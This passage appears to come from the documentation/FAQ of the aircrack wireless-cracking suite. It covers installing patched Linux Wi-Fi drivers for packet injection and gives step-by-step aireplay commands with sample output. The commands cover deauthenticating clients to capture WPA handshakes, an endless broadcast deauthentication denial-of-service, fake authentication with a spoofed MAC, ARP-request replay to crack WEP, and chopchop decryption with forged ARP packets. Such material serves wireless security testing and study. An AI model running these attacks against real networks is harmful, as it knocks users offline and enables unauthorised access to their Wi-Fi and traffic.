  577.                    | DSSS / CCK | 1M, 2M, 5.5M, 11M               |
  578.                    |------------+---------------------------------|
  579.                    | OFDM (a/g) | 6M, 9M, 12M, 24M, 36M, 48M, 54M |
  580.                    +----------------------------------------------+
  581.         When using attacks 2, 3 and 4, changing the number of packets per
  582.         second sent by aireplay (option -x) sometimes helps getting better
  583.         results; the default is 500 pps.
  584.       + Installing the prism54 driver (PrismGT FullMAC cards)
  585.         ifconfig eth1 down
  586.         rmmod prism54
  587.         cd /usr/src
  588.         wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz
  589.         wget http://100h.org/wlan/linux/patches/prism54-svn-20050724.patch
  590.         tar -xvzf prism54-svn-20050724.tgz
  591.         cd prism54-svn-20050724
  592.         patch -Np1 -i ../prism54-svn-20050724.patch
  593.         make modules && make install
  594.         wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
  595.         mkdir -p /usr/lib/hotplug/firmware
  596.         mkdir -p /lib/firmware
  597.         cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
  598.         mv 1.0.4.3.arm /lib/firmware/isl3890
  599.         depmod -a
  600.       + Installing the HostAP driver (Prism2 cards)
  601.         ifconfig wlan0 down
  602.         wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
  603.         /etc/init.d/CardBus stop
  604.         rmmod prism2_pci
  605.         rmmod hostap_pci
  606.         cd /usr/src
  607.         wget http://100h.org/wlan/linux/prism2/hostap-driver-0.4.5.tar.gz
  608.         wget http://100h.org/wlan/linux/patches/hostap-driver-0.3.9.patch
  609.         tar -xvzf hostap-driver-0.4.5.tar.gz
  610.         cd hostap-driver-0.4.5
  611.         patch -Np1 -i ../hostap-driver-0.3.9.patch
  612.         make && make install
  613.         mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
  614.         /etc/init.d/pcmcia start
  615.         modprobe hostap_pci &>/dev/null
  616.       + Installing the wlan-ng driver (Prism2 cards)
  617.         Important note: when the card is inserted, wlan-ng will flash the
  618.         firmware in RAM (volatile download) with versions PRI 1.1.4 and STA
  619.         1.8.3. Many users experienced problems with this operation, so in any
  620.         case it's safer to just use hostap instead. Furthermore, HostAP works
  621.         more reliably and supports iwconfig whereas wlan-ng doesn't.
  622.         ifconfig wlan0 down
  623.         wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
  624.         /etc/init.d/pcmcia stop
  625.         rmmod prism2_pci
  626.         rmmod hostap_pci
  627.         find /lib/modules ( -name p80211* -o -name prism2* ) 
  628.             -exec rm -v {} ;
  629.         cd /usr/src
  630.         wget http://100h.org/wlan/linux/prism2/wlanng-0.2.1-pre26.tar.gz
  631.         wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-pre26.patch
  632.         tar -xvzf wlanng-0.2.1-pre26.tar.gz
  633.         cd wlanng-0.2.1-pre26
  634.         patch -Np1 -i ../wlanng-0.2.1-pre26.patch
  635.         make config && make all && make install
  636.         mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
  637.         /etc/init.d/pcmcia start
  638.         modprobe prism2_pci &>/dev/null
  639.       + Installing the r8180-sa2400 driver (RTL8180 cards)
  640.         ifconfig wlan0 down
  641.         rmmod r8180
  642.         cd /usr/src
  643.         wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
  644.         wget http://100h.org/wlan/linux/patches/rtl8180-0.21.patch
  645.         tar -xvzf rtl8180-0.21.tar.gz
  646.         cd rtl8180-0.21
  647.         patch -Np1 -i ../rtl8180-0.21.patch
  648.         make && make install
  649.         depmod -a
  650.         modprobe r8180
  651.       + Installing the rt2500 driver (Ralink b/g PCI/CardBus)
  652.         ifconfig ra0 down
  653.         rmmod rt2500
  654.         cd /usr/src
  655.         wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20051112.tgz
  656.         tar -xvzf rt2500-cvs-20051112.tgz
  657.         cd rt2500-cvs-20051112
  658.         cd Module
  659.         make && make install
  660.         modprobe rt2500
  661.         Make sure to load the driver with modprobe (not insmod) and to put the
  662.         card in Monitor mode before bringing the interface up.
  663.       + Installing the rt2570 driver (Ralink b/g USB)
  664.         ifconfig rausb0 down
  665.         rmmod rt2570
  666.         cd /usr/src
  667.         wget http://100h.org/wlan/linux/ralink/rt2570-cvs-20051112.tgz
  668.         tar -xvzf rt2570-cvs-20051112.tgz
  669.         cd rt2570-cvs-20051112
  670.         cd Module
  671.         make && make install
  672.         modprobe rt2570
  673. The driver won't compile.
  674.     This usually happens because the linux headers don't match your current
  675.     running kernel. In this situation, just recompile a fresh kernel, install
  676.     it and reboot. Then, try again compiling the driver.
  677.     See this HOWTO for more details about kernel compilation.
  678. How do I use aireplay ?
  679.     If the driver was properly patched, aireplay is able to inject raw 802.11
  680.     packets in Monitor mode; it currently implements a set of five different
  681.     attacks.
  682.     If you get "ioctl(SIOCGIFINDEX) failed: No such device", double check that
  683.     your device name is correct and that you haven't forgotten a parameter on
  684.     the command line.
  685.     In the following examples, 00:13:10:30:24:9C is the MAC address of the
  686.     access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a
  687.     wireless client.
  688.       + Attack 0: deauthentication
  689.         This attack is mostly useful to recover a hidden (not broadcasted)
  690.         ESSID and for capturing WPA handshakes by forcing clients to
  691.         reauthenticate. It can also be used to generate ARP requests as Windows
  692.         clients sometimes flush their ARP cache when disconnected. Of course,
  693.         this attack is totally useless if there are no associated wireless
  694.         clients.
  695.         It is usually more effective to target a specific station using the -c
  696.         parameter.
  697.         Some examples:
  698.           o WPA Handshake capture with an Atheros
  699.             airmon.sh start ath0
  700.             airodump ath0 out 6  (switch to another console)
  701.             aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
  702.             (wait for a few seconds)
  703.             aircrack -w /path/to/dictionary out.cap
  704.           o ARP request generation with a Prism2 card
  705.             airmon.sh start wlan0
  706.             airodump wlan0 out 6  (switch to another console)
  707.             aireplay -0 10 -a 00:13:10:30:24:9C wlan0
  708.             aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
  709.             After sending the five batches of deauthentication packets, we
  710.             start listening for ARP requests with attack 3. The -h option is
  711.             mandatory and has to be the MAC address of an associated client.
  712.             If the driver is wlan-ng, you must run the airmon.sh script;
  713.             otherwise the card won't be correctly setup for injection.
  714.           o Mass denial-of-service with a RT2500 card
  715.             airmon.sh start ra0
  716.             aireplay -0 0 -a 00:13:10:30:24:9C ra0
  717.             With parameter 0, this attack will loop forever sending
  718.             deauthentication packets to the broadcast address, thus preventing
  719.             clients from staying connected.
  720.       + Attack 1: fake authentication
  721.         This attack is only useful when you need an associated MAC address in
  722.         attacks 2, 3, 4 (-h option) and there is currently no associated
  723.         client. However it is genereally better to use the MAC address of a
  724.         real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The
  725.         fake auth attack does NOT generate ARP requests.
  726.         Also, subsequent attacks will likely perform better if you update the
  727.         MAC address of the card, so that it properly sends ACKs:
  728.         ifconfig ath0 down
  729.         ifconfig ath0 hw ether 00:11:22:33:44:55
  730.         ifconfig ath0 up
  731.         aireplay -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
  732.         12:14:06  Sending Authentication Request
  733.         12:14:06  Authentication successful
  734.         12:14:06  Sending Association Request
  735.         12:14:07  Association successful :-)
  736.         +---------------------------------------------------------------------+
  737.         | With patched madwifi CVS 2005-08-14, it's possible to inject        |
  738.         | packets while in Managed mode (the WEP key itself doesn't matter,   |
  739.         | as long as the AP accepts Open-System authentication). So, instead  |
  740.         | of running attack 1, you may just associate and inject / monitor    |
  741.         | through the athXraw interface:                                      |
  742.         |                                                                     |
  743.         | ifconfig ath0 down hw ether 00:11:22:33:44:55                       |
  744.         | iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA          |
  745.         | ifconfig ath0 up                                                    |
  746.         |                                                                     |
  747.         | sysctl -w dev.ath0.rawdev=1                                         |
  748.         | ifconfig ath0raw up                                                 |
  749.         | airodump ath0raw out 6                                              |
  750.         |                                                                     |
  751.         | Then you can run attack 3 or 4 (aireplay will automatically replace |
  752.         | ath0 with ath0raw below):                                           |
  753.         |                                                                     |
  754.         | aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0          |
  755.         | aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0                          |
  756.         |                                                                     |
  757.         +---------------------------------------------------------------------+
  758.         Some access points require to reassociate every 30 seconds, otherwise
  759.         our fake client is considered disconnected. In this case, setup the
  760.         periodic re-association delay:
  761.         aireplay -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
  762.         If this attacks seems to fail (aireplay keeps sending authentication
  763.         requests), MAC address filtering may be in place. Also make sure that:
  764.           o You are close enough to the access point.
  765.           o The driver is properly patched and installed.
  766.           o The card is configured on the same channel as the AP.
  767.           o The BSSID and ESSID (-a / -e options) are correct.
  768.           o If Prism2, make sure the firmware was updated.
  769.         As a reminder: you can't inject with a Centrino, Hermes, ACX1xx,
  770.         Aironet, ZyDAS, Marvell or Broadcom chipset because of firmware and/or
  771.         driver limitations.
  772.       + Attack 2: interactive packet replay
  773.         This attack allows you to choose a given packet for replaying; it
  774.         sometimes gives more effective results than attack 3 (automatic ARP
  775.         reinjection).
  776.         You could use it, for example, to attempt the "any data re-broadcast"
  777.         attack, which only works if the AP actually reencrypts WEP data
  778.         packets:
  779.         aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 
  780.             -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
  781.         You can also use attack 2 to manually replay WEP-encrypted ARP request
  782.         packets, which size is either 68 or 86 bytes (depending on the
  783.         operating system):
  784.         aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF 
  785.             -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
  786.         aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF 
  787.             -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
  788.       + Attack 3: ARP-request reinjection
  789.         The classic ARP-request replay attack is the most effective to generate
  790.         new IVs, and works very reliably. You need either the MAC address of an
  791.         associated client (00:09:5B:EB:C5:2B), of a fake MAC from attack 1
  792.         (00:11:22:33:44:55). You may have to wait for a couple of minutes, or
  793.         even longer, until an ARP request shows up; this attack will fail if
  794.         there is no traffic.
  795.         Please note that you can also reuse ARP requests from a previous
  796.         capture using the -r switch.
  797.         aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
  798.         Saving ARP requests in replay_arp-0627-121526.cap
  799.         You must also start airodump to capture replies.
  800.         Read 2493 packets (got 1 ARP requests), sent 1305 packets...
  801.       + Attack 4: KoreK's "chopchop" (CRC prediction)
  802.         This attack, when successful, can decrypt a WEP data packet without
  803.         knowing the key. It can even work against dynamic WEP. This attack does
  804.         not recover the WEP key itself, but merely reveals the plaintext.
  805.         However, most access points are not vulnerable at all. Some may seem
  806.         vulnerable at first but actually drop data packets shorter that 60
  807.         bytes. This attack requires at least one WEP data packet.
  808.          1. First, we decrypt one packet :
  809.             aireplay -4 -h 00:09:5B:EB:C5:2B ath0
  810.          2. Let's have a look at the IP address :
  811.             tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
  812.             reading from file replay_dec-0627-022301.cap, link-type [...]
  813.             IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
  814.          3. Then, forge an ARP request.
  815.             The source IP (192.168.1.100) doesn't matter, but the destination
  816.             IP (192.168.1.2) must respond to ARP requests. The source MAC must
  817.             belong to an associated station.
  818.             ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 
  819.             00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
  820.          4. And replay our forged ARP request :
  821.             aireplay -2 -r arp.cap ath0
  822. -------------------------------------------------------------------------------
  823.     Finally, I'd like to thank all the many, many people who contributed to
  824.     aircrack... you know who you are :-)
  825. -------------------------------------------------------------------------------